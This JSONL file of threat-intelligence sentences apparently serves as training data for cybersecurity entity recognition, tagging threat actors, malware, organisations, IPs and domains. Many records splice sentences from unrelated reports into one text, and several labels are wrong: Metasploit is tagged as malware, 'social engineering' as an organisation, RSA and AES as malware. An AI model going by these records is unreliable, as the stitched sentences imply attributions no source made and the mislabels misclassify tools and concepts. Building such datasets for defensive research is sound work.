{"text": "Due to the nature of this document , we assume that this campaign targets people with an interest in cyber security .", "spans": {}, "info": {"id": "cyberner_stix_train_006549", "source": "cyberner_stix_train"}}
{"text": "The names of the files and decoy content seem to be carefully crafted , often referencing controversial and topical political issues .", "spans": {}, "info": {"id": "cyberner_stix_train_006550", "source": "cyberner_stix_train"}}
{"text": "Conclusion and security recommendations The continued monitoring of XLoader showed how its operators continuously changed its features , such as its attack vector deployment infrastructure and deployment techniques . We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government . After writing the data to disk, receiver operations are complete and processor operations . Sandworm is a full - spectrum threat actor that has carried out espionage , influence and attack operations in support of Russia 's Main Intelligence Directorate ( GRU ) since at least 2009 .", "spans": {"MALWARE: XLoader": [[68, 75]], "THREAT_ACTOR: APT28": [[247, 252]], "THREAT_ACTOR: Sandworm": [[448, 456]], "ORGANIZATION: Russia 's Main Intelligence Directorate ( GRU )": [[570, 617]]}, "info": {"id": "cyberner_stix_train_006551", "source": "cyberner_stix_train"}}
{"text": "Figure 6 . The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents . Additional ways our customers can detect and block this threat are listed below .", "spans": {"ORGANIZATION: FireEye": [[87, 94]], "MALWARE: malicious documents": [[133, 152]]}, "info": {"id": "cyberner_stix_train_006552", "source": "cyberner_stix_train"}}
{"text": "Last month , researchers at Kaspersky reported on a Lazarus APT campaign targeting both macOS and Windows users . The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence .", "spans": {"ORGANIZATION: Kaspersky": [[28, 37]], "THREAT_ACTOR: Lazarus": [[52, 59]], "MALWARE: KopiLuwak": [[127, 136]], "THREAT_ACTOR: Turla": [[198, 203]]}, "info": {"id": "cyberner_stix_train_006553", "source": "cyberner_stix_train"}}
{"text": "Meanwhile , desktop banking Trojans developed the ability to execute various social engineering schemes by using web injections , a method that alters the content presented to the infected victim in their browser . The threat actor was able to leverage the web shell to run reconnaissance commands , steal credentials , and deploy other tools . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 .", "spans": {"THREAT_ACTOR: threat actor": [[219, 231]], "TOOL: web shell": [[257, 266]], "FILEPATH: ThreeDollars document": [[428, 449]]}, "info": {"id": "cyberner_stix_train_006554", "source": "cyberner_stix_train"}}
{"text": "“ Agent Smith ” will replace the original application ’ s activities with an in-house SDK ’ s activity , which will show the banner received from the server . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering . It used different programs like XMRig and JCE Miner over the course of our research . The observed activity included creation of web shells for persistent access , remote code execution , and reconnaissance for endpoint security solutions .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "THREAT_ACTOR: Clever Kitten": [[159, 172]], "ORGANIZATION: individual": [[338, 348]], "ORGANIZATION: social engineering": [[382, 400]], "MALWARE: XMRig": [[435, 440]], "MALWARE: JCE Miner": [[445, 454]]}, "info": {"id": "cyberner_stix_train_006555", "source": "cyberner_stix_train"}}
{"text": "However , the document does not link to the Egyptian Newspaper website , but instead to a file sharing website called Egnyte .", "spans": {"TOOL: Egnyte": [[118, 124]]}, "info": {"id": "cyberner_stix_train_006556", "source": "cyberner_stix_train"}}
{"text": "The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": {"SYSTEM: The Windows 10 Creators Update": [[0, 30]], "TOOL: Windows Defender ATP": [[66, 86]]}, "info": {"id": "cyberner_stix_train_006557", "source": "cyberner_stix_train"}}
{"text": "Update Jul 11 2016 8:32 : On Monday , a Checkpoint representative disputed Lookout 's contention and pointed to this blog post from security firm Eleven Paths as support . Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses . APT33 : 8.26.21.120 [REDACTED].ddns.net . The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname “ PIG GOD”—another", "spans": {"ORGANIZATION: Checkpoint": [[40, 50]], "ORGANIZATION: Lookout": [[75, 82]], "ORGANIZATION: Eleven Paths": [[146, 158]], "THREAT_ACTOR: Lazarus": [[246, 253]], "THREAT_ACTOR: groups": [[272, 278]], "THREAT_ACTOR: cybercriminals": [[295, 309]], "THREAT_ACTOR: APT33": [[380, 385]], "IP_ADDRESS: 8.26.21.120": [[388, 399]], "DOMAIN: [REDACTED].ddns.net": [[400, 419]]}, "info": {"id": "cyberner_stix_train_006558", "source": "cyberner_stix_train"}}
{"text": "Targeting profiles included defense related commercial and military organizations , and telecommunications .", "spans": {}, "info": {"id": "cyberner_stix_train_006559", "source": "cyberner_stix_train"}}
{"text": "In addition , this type of Android banking malware does not require the device to be rooted or the app to have any specific Android permission ( besides android.permission.INTERNET to retrieve the overlay contents and send its captured data ) . The BlackTech group is primarily focused on cyberespionage in Asia . The implementation is quite simple : After the handshake , 2 threads that deal with data transfer are spawned . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": {"SYSTEM: Android": [[27, 34], [124, 131]], "ORGANIZATION: CSP": [[484, 487]]}, "info": {"id": "cyberner_stix_train_006560", "source": "cyberner_stix_train"}}
{"text": "Observe below the code routine for call recording . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer . By hunting through known malware repositories , Morphisec identified matching samples uploaded by Israeli high-tech development companies , medical organizations and education organizations , indicating that they were victims of the attack . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": {"TOOL: LOWBALL malware": [[61, 76]], "THREAT_ACTOR: admin@338": [[117, 126]], "MALWARE: upload.bat": [[153, 163]], "ORGANIZATION: Morphisec": [[281, 290]], "ORGANIZATION: medical organizations": [[373, 394]], "ORGANIZATION: education organizations": [[399, 422]], "VULNERABILITY: allow attackers to gain escalated privileges and unauthorized access to an environment": [[507, 593]], "ORGANIZATION: Progress": [[663, 671]]}, "info": {"id": "cyberner_stix_train_006561", "source": "cyberner_stix_train"}}
{"text": "Before interpreting the opcode , the VM decrypts the opcode ’ s content ( through a simple XOR algorithm ) , which it then relocates ( if needed ) , using the relocation fields . The use of Emissary appears to be focused only on Taiwan and Hong Kong , with regular malware updates to avoid detection and to increase the odds of success . Some hashes were redacted per request from one of the vendor . A cybercriminal may be impersonating a legitimate external user by using a Man in the Middle MiTM attack ,", "spans": {"TOOL: Emissary": [[190, 198]], "THREAT_ACTOR: cybercriminal": [[403, 416]]}, "info": {"id": "cyberner_stix_train_006562", "source": "cyberner_stix_train"}}
{"text": "Testing , Malware Artifacts , and Malicious Activity Suggests Tie to CNIIHM .", "spans": {"ORGANIZATION: CNIIHM": [[69, 75]]}, "info": {"id": "cyberner_stix_train_006563", "source": "cyberner_stix_train"}}
{"text": "We hope that this blog post helps other researchers to understand and analyze FinFisher samples and that this industry-wide information-sharing translate to the protection of as many customers as possible . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea . Based on ESET telemetry , one of the second stage payload delivered to victims is Win64/Winnti.BN . Its capabilities include retrieving and executing additional payloads , collecting basic system information , and executing shell commands .", "spans": {"MALWARE: FinFisher": [[78, 87]], "THREAT_ACTOR: threat actors": [[211, 224]], "THREAT_ACTOR: DRAGONFISH": [[241, 251]], "ORGANIZATION: ESET": [[399, 403]], "FILEPATH: Win64/Winnti.BN": [[472, 487]]}, "info": {"id": "cyberner_stix_train_006564", "source": "cyberner_stix_train"}}
{"text": "PLATINUM has consistently targeted victims within a small set of countries in South and Southeast Asia . Historically , Nitro is known for targeted spear phishing campaigns and using Poison Ivy malware , which was not seen in these attacks .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "MALWARE: Poison Ivy malware": [[183, 201]]}, "info": {"id": "cyberner_stix_train_006565", "source": "cyberner_stix_train"}}
{"text": "Apart from including the country ’ s name , the app ’ s name is probably intended to imply a relationship with the antifraud solution named GAS Tecnologia . We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea . Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable .", "spans": {"SYSTEM: GAS Tecnologia": [[140, 154]], "THREAT_ACTOR: them": [[166, 170]], "TOOL: DLL": [[405, 408], [444, 447]]}, "info": {"id": "cyberner_stix_train_006566", "source": "cyberner_stix_train"}}
{"text": "As the 2017 elections in Europe approach - most notably in Germany , France , and the Netherlands - we are already seeing the makings of similarly concerted efforts .", "spans": {}, "info": {"id": "cyberner_stix_train_006567", "source": "cyberner_stix_train"}}
{"text": "In April 2015 , we uncovered the malicious efforts of APT30 , a suspected China-based threat group that has exploited the networks of governments and organizations across the region , targeting highly sensitive political , economic and military information . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": {"THREAT_ACTOR: APT30": [[54, 59]], "ORGANIZATION: governments": [[134, 145]], "ORGANIZATION: organizations": [[150, 163]], "ORGANIZATION: sensitive political": [[201, 220]], "ORGANIZATION: economic": [[223, 231]], "ORGANIZATION: military": [[236, 244]], "THREAT_ACTOR: LuckyMouse": [[365, 375]], "ORGANIZATION: employees": [[469, 478]]}, "info": {"id": "cyberner_stix_train_006568", "source": "cyberner_stix_train"}}
{"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Symantec detects this threat as Backdoor.Nidiran .", "spans": {"MALWARE: PlugX": [[0, 5]], "ORGANIZATION: Symantec": [[210, 218]], "FILEPATH: Backdoor.Nidiran": [[242, 258]]}, "info": {"id": "cyberner_stix_train_006569", "source": "cyberner_stix_train"}}
{"text": "The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick .", "spans": {"THREAT_ACTOR: TA505": [[9, 14]], "MALWARE: Trick": [[39, 44], [124, 129]], "MALWARE: Locky": [[110, 115]]}, "info": {"id": "cyberner_stix_train_006570", "source": "cyberner_stix_train"}}
{"text": "Another important modification is in the message transfer process : With this modification , an application sends device location coordinates with every message . Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign . GreezeBackdoor is a tool of the DarkHotel APT group , which we have previously written about .", "spans": {"ORGANIZATION: we've": [[189, 194]], "THREAT_ACTOR: this group": [[200, 210]], "THREAT_ACTOR: Buhtrap": [[329, 336]], "MALWARE: GreezeBackdoor": [[390, 404]], "THREAT_ACTOR: DarkHotel": [[422, 431]]}, "info": {"id": "cyberner_stix_train_006571", "source": "cyberner_stix_train"}}
{"text": "Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": {"THREAT_ACTOR: Leviathan": [[21, 30]], "ORGANIZATION: maritime industry": [[57, 74]], "ORGANIZATION: research institutes": [[81, 100]], "ORGANIZATION: academic organizations": [[103, 125]], "ORGANIZATION: private firms": [[132, 145]], "ORGANIZATION: political activist": [[258, 276]], "ORGANIZATION: British-Iranian": [[354, 369]]}, "info": {"id": "cyberner_stix_train_006572", "source": "cyberner_stix_train"}}
{"text": "The idea is simple - if the infected device belongs to a real person , sooner or later this person will move around , increasing the step counter . They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands .", "spans": {"MALWARE: They": [[148, 152]], "MALWARE: Remexi": [[296, 302]], "MALWARE: Trojan": [[324, 330]], "THREAT_ACTOR: Cadelle": [[343, 350]]}, "info": {"id": "cyberner_stix_train_006573", "source": "cyberner_stix_train"}}
{"text": "The overlaps between these two sets of attacks include exploitation of a common vulnerability , similar toolset and a shared government victimology , but no strong pivot points to connect these attack campaigns together .", "spans": {}, "info": {"id": "cyberner_stix_train_006574", "source": "cyberner_stix_train"}}
{"text": "Asacub versions Sewn into the body of the Trojan is the version number , consisting of two or three digits separated by periods . CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations . It appears hacking group Outlaw , which has been silent for the past few months , was simply developing their toolkit for illicit income sources . Threat actors often compete for the same resources , and this could n't be further from the truth when it comes to website compromises .", "spans": {"MALWARE: Asacub": [[0, 6]], "ORGANIZATION: CTU": [[130, 133]], "THREAT_ACTOR: Threat Group-1314": [[198, 215]], "THREAT_ACTOR: Outlaw": [[329, 335]], "THREAT_ACTOR: Threat actors": [[451, 464]], "ORGANIZATION: website compromises": [[566, 585]]}, "info": {"id": "cyberner_stix_train_006575", "source": "cyberner_stix_train"}}
{"text": "This RAT is the origin of the attackers ' group name . The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": {"TOOL: RAT": [[5, 8]], "THREAT_ACTOR: attackers": [[30, 39]], "THREAT_ACTOR: group": [[42, 47]], "ORGANIZATION: Group-IB": [[87, 95]], "ORGANIZATION: bank": [[185, 189]]}, "info": {"id": "cyberner_stix_train_006576", "source": "cyberner_stix_train"}}
{"text": "The hackers also started tweeting a few samples of internal emails from the company . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"TOOL: Flash Player": [[121, 133]], "VULNERABILITY: exploit": [[134, 141]], "VULNERABILITY: CVE-2016-4117": [[144, 157]]}, "info": {"id": "cyberner_stix_train_006577", "source": "cyberner_stix_train"}}
{"text": "HenBox is not running as a system app ) , another ELF library is loaded to aid with executing super-user commands . In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear . After compromising a political organization , APT28 will steal internal data .", "spans": {"MALWARE: HenBox": [[0, 6]], "THREAT_ACTOR: APT41": [[138, 143]], "ORGANIZATION: third healthcare": [[153, 169]], "ORGANIZATION: political organization": [[260, 282]], "THREAT_ACTOR: APT28": [[285, 290]]}, "info": {"id": "cyberner_stix_train_006578", "source": "cyberner_stix_train"}}
{"text": "That 's because the malware roots most of the phones it infects , a process that subverts key security mechanisms built into Android . CTU researchers have observed NICKEL ACADEMY ( Lazarus ) copying and pasting job descriptions from online recruitment sites in previous campaigns . APT33 : 8.26.21.221 [REDACTED].ddns.net . While we were unable to identify the SCIL commands executed , we believe they were probably commands to open circuit breakers in the victim ’s substation environments .", "spans": {"SYSTEM: Android": [[125, 132]], "ORGANIZATION: CTU": [[135, 138]], "THREAT_ACTOR: NICKEL ACADEMY": [[165, 179]], "THREAT_ACTOR: Lazarus": [[182, 189]], "THREAT_ACTOR: APT33": [[283, 288]], "IP_ADDRESS: 8.26.21.221": [[291, 302]], "DOMAIN: [REDACTED].ddns.net": [[303, 322]]}, "info": {"id": "cyberner_stix_train_006579", "source": "cyberner_stix_train"}}
{"text": "] orgaryastark [ . Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran . The supplied registrant information does not need to be accurate for the zone to be registered successfully . Scripts should be captured from the file system when possible to determine their actions and intent .", "spans": {}, "info": {"id": "cyberner_stix_train_006580", "source": "cyberner_stix_train"}}
{"text": "Unfortunately , for now we can ’ t say in what environment these landing pages were used in the wild , but according to all the information at our dsiposal , we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks . Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before . The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China .", "spans": {"MALWARE: Panda Banker": [[335, 347]], "THREAT_ACTOR: admin@338": [[361, 370]], "ORGANIZATION: media companies": [[399, 414]], "ORGANIZATION: political": [[441, 450]], "ORGANIZATION: economic": [[455, 463]]}, "info": {"id": "cyberner_stix_train_006581", "source": "cyberner_stix_train"}}
{"text": "The following protections are in place to protect customers against Earworm attacks :", "spans": {"THREAT_ACTOR: Earworm": [[68, 75]]}, "info": {"id": "cyberner_stix_train_006582", "source": "cyberner_stix_train"}}
{"text": "The VM dispatcher loop routine ends with a JMP to another routine . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload . In either case , the malware stops running . Among the group ’s most interesting characteristics are : • Strong functional and structural similarities linking its malware toolset to early MiniDuke and more recent CosmicDuke and OnionDuke components In early 2013 , GReAT observed several incidents that were so unusual they suggested the existence of a new , previously unknown threat actor .", "spans": {"ORGANIZATION: Unit 42": [[87, 94]], "TOOL: Emissary Trojan": [[153, 168]], "MALWARE: MiniDuke": [[372, 380]], "MALWARE: CosmicDuke": [[397, 407]], "MALWARE: OnionDuke": [[412, 421]], "ORGANIZATION: GReAT": [[449, 454]]}, "info": {"id": "cyberner_stix_train_006583", "source": "cyberner_stix_train"}}
{"text": "With this blog series we will be sharing our research analysis with the research and broader security community , starting with the PHA family , Zen . In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted . On November 26, 2015, a suspected China based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . the web shell included the ability to run arbitrary commands and upload , delete , and view the contents of files .", "spans": {"MALWARE: Zen": [[145, 148]], "THREAT_ACTOR: MoneyTaker": [[175, 185]], "ORGANIZATION: banks": [[229, 234]], "ORGANIZATION: law firm": [[239, 247]], "ORGANIZATION: bank": [[254, 258]], "TOOL: emails": [[393, 399]]}, "info": {"id": "cyberner_stix_train_006584", "source": "cyberner_stix_train"}}
{"text": "All of the other IP address we discovered sharing the same TLS certificate behave in the same way . One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government . It enables the attackers to spy on victims using rather basic backdoor capabilities . Kaspersky ’s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": {"ORGANIZATION: government": [[180, 190]], "MALWARE: backdoor": [[255, 263]], "ORGANIZATION: Kaspersky ’s Global Research and Analysis Team ( GReAT )": [[279, 335]]}, "info": {"id": "cyberner_stix_train_006585", "source": "cyberner_stix_train"}}
{"text": "FireEye identified overlaps between the domain registration details of CyberCaliphate ’s website and APT28 infrastructure .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: CyberCaliphate": [[71, 85]], "THREAT_ACTOR: APT28": [[101, 106]]}, "info": {"id": "cyberner_stix_train_006586", "source": "cyberner_stix_train"}}
{"text": "Backdoor.APT.PittyTiger1.3 ( aka CT RAT ) – This malware is likely used as a second-stage backdoor . On it , MoneyTaker install a legitimate tool for penetration testing – Metasploit .", "spans": {"MALWARE: Backdoor.APT.PittyTiger1.3": [[0, 26]], "TOOL: CT RAT": [[33, 39]], "TOOL: second-stage backdoor": [[77, 98]], "THREAT_ACTOR: MoneyTaker": [[109, 119]], "MALWARE: Metasploit": [[172, 182]]}, "info": {"id": "cyberner_stix_train_006587", "source": "cyberner_stix_train"}}
{"text": "The group has also been reported as Leviathanby other security firms . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: Leviathanby": [[36, 47]], "FILEPATH: Pony": [[119, 123]], "FILEPATH: Vawtrak": [[128, 135]]}, "info": {"id": "cyberner_stix_train_006589", "source": "cyberner_stix_train"}}
{"text": "The operators retrieve these files on the machine using the DOWNLOAD_LIST command .", "spans": {}, "info": {"id": "cyberner_stix_train_006590", "source": "cyberner_stix_train"}}
{"text": "Called “ DEFENSOR ID ” , the banking trojan was available on Google Play at the time of the analysis . At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components . Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples .", "spans": {"MALWARE: DEFENSOR ID": [[9, 20]], "SYSTEM: Google Play": [[61, 72]], "THREAT_ACTOR: Lazarus Group": [[305, 318]], "MALWARE: compromised infrastructure": [[324, 350]]}, "info": {"id": "cyberner_stix_train_006591", "source": "cyberner_stix_train"}}
{"text": "Details : Name : Super Mario Run Package Name : net.droidjack.server MD5 : 69b4b32e4636f1981841cbbe3b927560 Technical Analysis : The malicious package claims to be the Super Mario Run game , as shown in the permissions screenshot below , but in reality this is a malicious RAT called DroidJack ( also known as SandroRAT ) that is getting installed . In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . The fileless attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word , CVE-2017-0199 , to install a fileless attack variant of the Helminth Trojan agent . For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": {"SYSTEM: Super Mario Run": [[17, 32], [168, 183]], "MALWARE: DroidJack": [[284, 293]], "MALWARE: SandroRAT": [[310, 319]], "THREAT_ACTOR: threat actors": [[371, 384]], "ORGANIZATION: media organizations": [[443, 462]], "THREAT_ACTOR: fileless attack": [[517, 532]], "TOOL: Microsoft Word": [[551, 565]], "VULNERABILITY: zero-day": [[600, 608]], "TOOL: Word": [[626, 630]], "VULNERABILITY: CVE-2017-0199": [[633, 646]], "MALWARE: Helminth": [[693, 701]], "MALWARE: Trojan": [[702, 708]], "TOOL: PowerShell": [[844, 854]]}, "info": {"id": "cyberner_stix_train_006592", "source": "cyberner_stix_train"}}
{"text": "If the privileges are revoked successfully , the Trojan relaunches the cycle of requesting administrator privileges . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . WCry uses a combination of the RSA and AES algorithms to encrypt files .", "spans": {"TOOL: Powermud backdoor": [[147, 164]], "MALWARE: Backdoor.Powemuddy": [[184, 202]], "TOOL: custom tools": [[211, 223]], "MALWARE: makecab.exe": [[356, 367]], "MALWARE: WCry": [[424, 428]], "MALWARE: RSA": [[455, 458]], "MALWARE: AES": [[463, 466]]}, "info": {"id": "cyberner_stix_train_006593", "source": "cyberner_stix_train"}}
{"text": "SHA256 : d773b12894d4a0ffb0df328e7e1aa4a7112455e88945a10471650e503eecdb3d .", "spans": {"FILEPATH: d773b12894d4a0ffb0df328e7e1aa4a7112455e88945a10471650e503eecdb3d": [[9, 73]]}, "info": {"id": "cyberner_stix_train_006594", "source": "cyberner_stix_train"}}
{"text": "\" Mundizza '' is a dialectal word , a derivative of the proper Italian word \" immondizia '' that translates to \" trash '' or \" garbage '' in English . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . In fact , it is almost unusual in its unsophistication . Regardless of the cause , these leaks are having a significant effect on the threat landscape , making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge .", "spans": {"MALWARE: Microsoft Word attachment": [[235, 260]], "VULNERABILITY: CVE-2017-0199": [[293, 306]], "TOOL: ZeroT Trojan": [[321, 333]], "TOOL: PlugX Remote Access Trojan": [[365, 391]], "TOOL: RAT": [[394, 397]]}, "info": {"id": "cyberner_stix_train_006595", "source": "cyberner_stix_train"}}
{"text": "This archive is stored in the same host has the webviews . The group is known for espionage campaigns in the Middle East . Once loaded and the export entry of Rmcmd is called , it creates a Windows B-TOOL S-OS mutex named gkdflbmdfk . By understanding the TTPs of the leaked source codes , defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors .", "spans": {"THREAT_ACTOR: group": [[63, 68]], "TOOL: gkdflbmdfk": [[222, 232]]}, "info": {"id": "cyberner_stix_train_006596", "source": "cyberner_stix_train"}}
{"text": "] 204 [ . This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . If the DownloadString method is located it will contact the hard coded C2 requesting a file , which is downloaded and then invoked ( highlighted in blue ) . Another common delivery mechanism for ransomware attacks is via phishing emails , compounding the problem for security teams already overburdened with managing an evergrowing volume of suspicious messages that require review .", "spans": {"TOOL: MiniDuke": [[55, 63]], "TOOL: CosmicDuke": [[66, 76]], "TOOL: OnionDuke": [[79, 88]], "TOOL: CozyDuke": [[91, 99]], "THREAT_ACTOR: Dukes": [[114, 119]], "THREAT_ACTOR: cyberespionage group": [[172, 192]], "TOOL: DownloadString": [[364, 378]], "TOOL: C2": [[428, 430]]}, "info": {"id": "cyberner_stix_train_006597", "source": "cyberner_stix_train"}}
{"text": "ONLINE – send information about Trojan ’ s current status to C & C : whether it has device administrator privileges , which HTML page is currently displayed , whether screen is on or off , etc . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": {"TOOL: Nidiran": [[228, 235]], "TOOL: self-extracting executable": [[259, 285]], "MALWARE: .tmp": [[320, 324]], "THREAT_ACTOR: Leafminer": [[361, 370]], "VULNERABILITY: exploit": [[385, 392]], "TOOL: SMB": [[485, 488]], "VULNERABILITY: vulnerabilities": [[489, 504]], "ORGANIZATION: Microsoft": [[518, 527]]}, "info": {"id": "cyberner_stix_train_006598", "source": "cyberner_stix_train"}}
{"text": "Artifact #2 operates as a backchannel for the attacker to maintain a foothold inside the compromised network .", "spans": {}, "info": {"id": "cyberner_stix_train_006599", "source": "cyberner_stix_train"}}
{"text": "The ‘ onload5 ’ function is responsible for adding the newly loaded SWF object as a child object .", "spans": {"TOOL: SWF": [[68, 71]]}, "info": {"id": "cyberner_stix_train_006600", "source": "cyberner_stix_train"}}
{"text": "With each networked IoT device having its own separate network stack , it ’s quite easy to see the need for better enterprise management , especially in today ’s “ bring your own device ” world .", "spans": {"TOOL: IoT": [[20, 23]]}, "info": {"id": "cyberner_stix_train_006601", "source": "cyberner_stix_train"}}
{"text": "July 13 Further analysis of the hacking team dump revealed that the company used UEFI BIOS rootkit to keep their Remote Control System ( RCS ) agent installed in their targets ’ systems . If successful , Cobalt goes on to attack financial institutions outside the country . . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": {"MALWARE: UEFI BIOS rootkit": [[81, 98]], "MALWARE: Remote Control System ( RCS )": [[113, 142]], "THREAT_ACTOR: Cobalt": [[204, 210]], "ORGANIZATION: financial institutions": [[229, 251]], "ORGANIZATION: CrowdStrike incident responders": [[430, 461]], "THREAT_ACTOR: attacker": [[590, 598]], "TOOL: Remote PowerShell": [[609, 626]]}, "info": {"id": "cyberner_stix_train_006602", "source": "cyberner_stix_train"}}
{"text": "Coronavirus Update App Leads to Project Spy Android and iOS Spyware We discovered a cyberespionage campaign we have named Project Spy infecting Android and iOS devices with spyware by using the coronavirus disease ( Covid-19 ) as a lure . Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected . for example , Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": {"SYSTEM: Coronavirus Update App": [[0, 22]], "MALWARE: Project Spy": [[32, 43], [122, 133]], "SYSTEM: Android": [[44, 51], [144, 151]], "SYSTEM: iOS": [[56, 59], [156, 159]], "ORGANIZATION: Symantec": [[247, 255]], "THREAT_ACTOR: Gallmaker": [[292, 301]], "ORGANIZATION: Cisco Talos": [[366, 377]], "TOOL: Foxit PDF Reader": [[514, 530]], "TOOL: Adobe Acrobat": [[584, 597]]}, "info": {"id": "cyberner_stix_train_006603", "source": "cyberner_stix_train"}}
{"text": "On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user .", "spans": {"ORGANIZATION: NSA": [[133, 136]], "VULNERABILITY: ETERNALBLUE": [[161, 172]], "THREAT_ACTOR: 'darkhydrus'": [[301, 313]], "THREAT_ACTOR: ‘Williams’": [[333, 343]], "ORGANIZATION: Twitter user": [[380, 392]]}, "info": {"id": "cyberner_stix_train_006604", "source": "cyberner_stix_train"}}
{"text": "As shown within the timeline above , the WINDSHIFT activity observed by Unit 42 falls between January and May of 2018 . Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation .", "spans": {"ORGANIZATION: Unit 42": [[72, 79]], "THREAT_ACTOR: Silence": [[120, 127]], "ORGANIZATION: Central Bank": [[180, 192]]}, "info": {"id": "cyberner_stix_train_006605", "source": "cyberner_stix_train"}}
{"text": "It does so by calling a sub-function to decrypt the content , using the value stored in the ‘ r1 ’ variable as a key .", "spans": {}, "info": {"id": "cyberner_stix_train_006606", "source": "cyberner_stix_train"}}
